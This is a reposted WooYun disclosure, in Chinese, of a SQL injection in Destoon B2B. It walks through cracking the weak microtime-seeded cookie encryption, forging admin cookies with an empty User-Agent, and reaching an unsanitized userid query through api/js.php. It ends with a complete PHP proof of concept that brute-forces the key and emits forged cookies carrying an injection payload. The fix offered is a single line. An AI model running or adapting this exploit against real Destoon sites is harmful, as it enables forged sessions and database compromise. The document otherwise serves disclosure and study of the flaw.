Destoon B2B 绕过全局防御暴力注入

技术 作者:HackerEye 2018-08-24 09:33:30
  1. 发布时间: 2014-05-26
  2. 公开时间: 2014-08-24
  3. 漏洞类型: SQL注射
  4. 危害等级: 高
  5. 漏洞编号: WooYun-2014-62391
  6. 测试版本:2014-05-21

简要描述

destoon某加密函数缺陷可破解导致注入, 由于字符串加密,所以自带的全局strip_sql gpc等直接无视了 使用不安全的“随机数”的实例 搬个小凳子吧,这个一时半会儿说不完...

详细说明

出问题的是用于cookie加解密的encrypt和decrypt函数 首先看一下函数内容include/global.func.php 122行
function encrypt($txt, $key = '') {
    $key or $key = DT_KEY; //DT_KEY是在安装时生成的一个15位随机字符串
    $rnd = md5(microtime());//缺陷 下面说
    $len = strlen($txt);
    $ren = strlen($rnd);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == $ren ? 0 : $ctr;
        $str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]); //只是简单的按位异或
    }
    return str_replace('=', '', base64_encode(kecrypt($str, $key)));
}

function decrypt($txt, $key = '') {
    $key or $key = DT_KEY; //这里才用到key
    $txt = kecrypt(base64_decode($txt), $key);
    $len = strlen($txt);
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $tmp = $txt[$i];
        $str .= $txt[++$i] ^ $tmp; //也是异或
    }
    return $str;
}  
粗看有随机数、有随机时间值、还做md5hash再异或好像很安全的样子,因为有两个未知key md5(microtime())和DT_KEY 等等 真的是两个么?搜一下microtime()的定义 定义和用法 microtime() 函数返回当前 Unix 时间戳和微秒数。例子
<?php
echo(microtime());
?>
输出
0.25139300 1138197510
时间戳好说 http头中有个date值就是,微秒嘛后面两位固定为00前面有6位不可预知,6位也就是100W个可能,只要穷举100W次肯定有一次是正确的key(不要被100W吓到,本地跑起来是很快的) 再来看encrypt函数 简单表示一下 加密前的原文txt = a microtime生成的key = b md5(DT_KEY) = c 最后生成的密文 = d 整个流程简单来说就是
a^b = x
x^c = d
现在b是已知的 如果能找到一个原文和密文的对照 也就是a和d 那就可以通过abd来推算出c 也就是key destoon很贴心的写了一段正好符合要求的代码 include/module.func.php 140行
function anti_spam($string) {
    global $MODULE, $DT;
    if($DT['anti_spam'] && preg_match("/^[a-z0-9_@\-\s\/\.\,\(\)\+]+$/i", $string)) {
        do {
            $tmp = encrypt($string); //加密
            if(strpos($tmp, '0x') === false) break;
        } while(1);
        return '<img src="'.$MODULE[3]['linkurl'].'image.php?auth='.rawurlencode($tmp).'" align="absmddle"/>';//输出
    } else {
        return $string;
    }
}  
这个函数的功能是“将电话、传真、Email等重要信息显示为图片格式,防止采集和复制” 调用示范
{if $member[mail]}<li><span>邮件</span>{anti_spam($member[mail])}</li>{/if}
{if $member[telephone]}<li><span>电话</span>{anti_spam($member[telephone])}</li>{/if}
{if $member[fax]}<li><span>传真</span>{anti_spam($member[fax])}</li>{/if}  
没有比这个更好的输出点了,没有任何干扰。 这里拿官方demo做演示,随便找家公司查看联系方式 http://example.com/contact/
2616064266810eb703171c3c3fd83e2a63d46efd.jpg
Mon, 26 May 2014 07:12:43 GMT 转成unix时间戳并加8个小时为1401088363
26160734ba991d79dde1a99bd619b4bee672d3fb.jpg
运气不错 15W多次就出来了 总共脚本运行时间大概就2秒 到这里 我们已经拿到了MD5后的DT_KEY,那么怎么来用这个key呢 跑MD5来还原真实的KEY也是一种思路,不过15位大小写+数字的彩虹表还是蛮大的。 回去搜了一下encrypt和decrypt函数的调用,找到了cookie的加解密 module/member/member.class.php 行376
$auth = encrypt($user['userid']."\t".$user['username']."\t".$user['groupid']."\t".$user['password']."\t".$user['admin'], md5(DT_KEY.$_SERVER['HTTP_USER_AGENT']));
set_cookie('auth', $auth, $cookietime);
set_cookie('userid', $user['userid'], $cookietime);
set_cookie('username', $user['username'], $DT_TIME + 86400*365);  
登录完成后setcookie的地方,可以看到 cookie是
userid{制表符}username{制表符}groupid{制表符}password{制表符}admin  
拼起来然后用
md5(DT_KEY+useragent)作为密钥用encrypt函数做加密的
小伙伴们都知道 user-agent是客户端提交的,如果我提交个空的user-agent,cookie就会用md5(DT_KEY)作为密钥,是不是很眼熟呢,这个就是我们上一步跑出来的东西。 现在我们已经可以伪造出任意合法的cookie了,一般到这里漏洞就要结束了 可惜destoon没想那么简单(已经很麻烦了)把rank给我 我们来看看cookie的验证过程/common.inc.php行135
$destoon_auth = get_cookie('auth');
if($destoon_auth) { 
    $_dauth = explode("\t", decrypt($destoon_auth, md5(DT_KEY.$_SERVER['HTTP_USER_AGENT'])));//解密也是用的DT_KEY+user-agent
    $_userid = isset($_dauth[0]) ? intval($_dauth[0]) : 0;
    $_username = isset($_dauth[1]) ? trim($_dauth[1]) : '';
    $_groupid = isset($_dauth[2]) ? intval($_dauth[2]) : 3;
    $_admin = isset($_dauth[4]) ? intval($_dauth[4]) : 0;
    if($_userid && !defined('DT_NONUSER')) {
        $_password = isset($_dauth[3]) ? trim($_dauth[3]) : '';
        $USER = $db->get_one("SELECT username,passport,company,truename,password,groupid,email,message,chat,sound,online,sms,credit,money,loginip,admin,aid,edittime,trade FROM {$DT_PRE}member WHERE userid=$_userid");
        if($USER && $USER['password'] == $_password) {      //居然验证密码了...cookie伪造在这里失败了  
不死心继续搜索decrypt的调用,终于又发现了一个问题 module/member/admin.inc.php
<?php 
defined('IN_DESTOON') or exit('Access Denied');
$admin_user = false;
if($_groupid == 1) {
    $admin_user = decrypt(get_cookie('admin_user'));
    if($admin_user) {
        $_USER = explode('|', $admin_user); //cookie格式 uid|uname
        if($_username = $_USER[1]) {
            $userid = $_USER[0];// userid来自cookie 且经过decrypt 无视防御
            $USER = $db->get_one("SELECT username,passport,company,truename,password,groupid,email,message,chat,sound,online,sms,credit,money,loginip,admin,aid,edittime,trade FROM {$DT_PRE}member WHERE userid=$userid");//userid直接进sql
            if($USER) {
                $_userid = $userid;
                extract($USER, EXTR_PREFIX_ALL, '');
                $MG = cache_read('group-'.$_groupid.'.php');
                $admin_user = true;
            }
        }
    }
}
?>  
很明显的一个注入点,虽然Destoon默认不开启DEBUG,不显示错误信息,但我们一样可以用时间延迟来注入。 来看看注入的条件,首先进入查询的前提是$_groupid == 1 来看这个文件的调用,还是在/common.inc.php行135
$destoon_auth = get_cookie('auth');
if($destoon_auth) { 
    $_dauth = explode("\t", decrypt($destoon_auth, md5(DT_KEY.$_SERVER['HTTP_USER_AGENT'])));
    $_userid = isset($_dauth[0]) ? intval($_dauth[0]) : 0;
    $_username = isset($_dauth[1]) ? trim($_dauth[1]) : '';
    $_groupid = isset($_dauth[2]) ? intval($_dauth[2]) : 3; //来自cookie 可以伪造
    $_admin = isset($_dauth[4]) ? intval($_dauth[4]) : 0;
    if($_userid && !defined('DT_NONUSER')) {    //如果进入这个if就失败
        $_password = isset($_dauth[3]) ? trim($_dauth[3]) : '';
        $USER = $db->get_one("SELECT username,passport,company,truename,password,groupid,email,message,chat,sound,online,sms,credit,money,loginip,admin,aid,edittime,trade FROM {$DT_PRE}member WHERE userid=$_userid");
        if($USER && $USER['password'] == $_password) { 
            if($USER['groupid'] == 2) dalert(lang('message->common_forbidden'));
            extract($USER, EXTR_PREFIX_ALL, ''); //伪造的groupid被覆盖
            if($USER['loginip'] != $DT_IP && ($DT['ip_login'] == 2 || ($DT['ip_login'] == 1 && IN_ADMIN))) {
                $_userid = 0; set_cookie('auth', '');
                dalert(lang('message->common_login', array($USER['loginip'])), DT_PATH);
            }
        } else {
            $_userid = 0; //置0
            if($db->linked && !isset($swfupload) && strpos($_SERVER['HTTP_USER_AGENT'], 'Flash') === false) set_cookie('auth', '');
        }
        unset($destoon_auth, $USER, $_dauth, $_password);
    }
}
if($_userid == 0) { $_groupid = 3; $_username = ''; } //如果userid==0就设置groupid为3 
if(!IN_ADMIN) {
    if($_groupid == 1) include DT_ROOT.'/module/member/admin.inc.php'; //如果到了这里$_groupid还是1 就包含  
这个地方纠结很久 差点都放弃了 不管cookie里userid和groupid改成什么只要流程进了第一个if就废了 userid跟password匹配的话,groupid就会被extract覆盖,userid跟password不匹配的话进入else userid会被置0 不进入这个if的方法 一是userid为false 二就是NT_NONUSER,搜了一下发现一个很合适的文件。 api/js.php
define('DT_NONUSER', true);     //符合要求
if($_SERVER['QUERY_STRING']) {
    $exprise = isset($_GET['tag_expires']) ? intval($_GET['tag_expires']) : 0;
    $moduleid = isset($_GET['moduleid']) ? intval($_GET['moduleid']) : 0;
    $moduleid > 3 or exit('document.write("<h2>Bad Parameter</h2>");'); //moduleid<3会退出
    $tag = $_SERVER['QUERY_STRING'];
    $_SERVER['QUERY_STRING'] = $_SERVER['REQUEST_URI'] = '';
    foreach($_GET as $k=>$v) { unset($$k); }
    $_GET = array();
    require '../common.inc.php'; //包含了!
    header("Content-type:text/javascript"); 
    ($DT['jstag'] && $DT['safe_domain'] && check_referer()) or exit('document.write("<h2>Invalid Referer</h2>");');  
只要get moduleid>3就能带着我们的DT_NONUSER包含common.inc.php从而进入admin.inc.php的包含最终实现注入了

漏洞证明

  1. 首先随便找个公司主页查看联系方式,需要记录3样东西:时间戳、原文、密文
  2. 将以上信息填入POC,运行POC获取cookie
    261615277632439f00c075537641cfd03c905f6f.jpg
  3. 用上一步生成的cookie去访问/api/js.php?moduleid=5,记得user-agent要设置为空,为了方便演示我这里把debug打开了 报错信息里能看到我们的注入语句
    261616196b5b70a3a0efb45cadfe4f88406fcc87.jpg
poc:(这个poc还有很多问题,比如它获取第一个符合正则的key就停止了 事实上有可能会碰上正好符合正则却不是真正key的情况,只要多获取几组数据看相同的就能找出真正的md5(DT_KEY))
<?php
printf("---------------------------------------------------
Destoon B2B V5.0 weak encryption Vulnerability
Author: Matt
E-mail: root@qaz.me
---------------------------------------------------\n\n");
$time = "1401088826";//服务器返回的时间 记得GMT要加8小时
$txt  = "admin88@**.**.**.**";//原始文本
$result = "WWFfPgdtWGcAbwJtCmNVQFc0VDRRaQNqDSZSeF1nVWVTZw";//密文
$md5key = crack($time,$txt,$result);
echo "[+]key found:".$md5key."\n";
echo "[+]------------------------------------------------\n";
echo "[+]Cookie:\n";
//以下这些除了uid和groupid其它都无所谓
$uid = "1";
$uname = "matt";
$groupid = "1"; //groupid = 1 包含
$password = "asdf";
$admin = "0";
$cookie = $uid."\t".$uname."\t".$groupid."\t".$password."\t".$admin;
$admin_user = '1xxxxx\'|asdf'; // “|”前写注入语句
echo "coe_auth=".encrypt($cookie, $md5key);
echo ";coe_admin_user=".encrypt($admin_user, $md5key, '1')."\n";
function decrypt($txt, $key = '') {
    $txt = kecrypt(base64_decode($txt), $key);
    $len = strlen($txt);
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $tmp = $txt[$i];
        $str .= $txt[++$i] ^ $tmp;
    }
    return $str;
}
function encrypt($txt, $key = '',$md5 = '0') {
    $rnd = md5(microtime());
    $len = strlen($txt);
    $ren = strlen($rnd);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == $ren ? 0 : $ctr;
        $str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]);
    }
    return str_replace('=', '', base64_encode(kecrypt($str, $key, $md5)));
}
function kecrypt($txt, $key, $md5) {
    $key = $md5 == "0" ? md5($key) : $key;
    $len = strlen($txt);
    $ken = strlen($key);
    $ctr = 0;
    $str = '';
    for($i = 0; $i < $len; $i++) {
        $ctr = $ctr == $ken ? 0 : $ctr;
        $str .= $txt[$i] ^ $key[$ctr++];
    }
    return $str;
}
function crack($time,$txt,$result){
    for ($a=1; $a < 999999; $a++) {
        if ($a%10000 == 0) {
            echo ".";
        }
        if ($a%100000 == 0) {
            echo $a."\n";
        }
        $m = str_repeat(0, 6 - strlen($a)).$a;
        $rnd = md5("0.".$m."00 ".$time);
        $len = strlen($txt);
        $ren = strlen($rnd);
        $ctr = 0;
        $str = '';
        for($i = 0; $i < $len; $i++) {
            $ctr = $ctr == $ren ? 0 : $ctr;
            $str .= $rnd[$ctr].($txt[$i] ^ $rnd[$ctr++]);
        }
        $key = '';
        $tmp = base64_decode($result);
        $x = 0 ;
        for ($k=0; $k < strlen($tmp); $k++) { 
            $x = $x == 32 ? 0 : $x;
            $key .= $tmp[$k] ^ $str[$x++];
        }
        if (preg_match("/[a-f,0-9]{32,}/", $key)) {
            echo "$a\n";
            return substr($key, 0,32);
            break;
        }
    }
}
?>  

修复方案

microtime不安全
作者:索马里的乌贼 链接:https://www.jianshu.com/p/0d511538006e

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接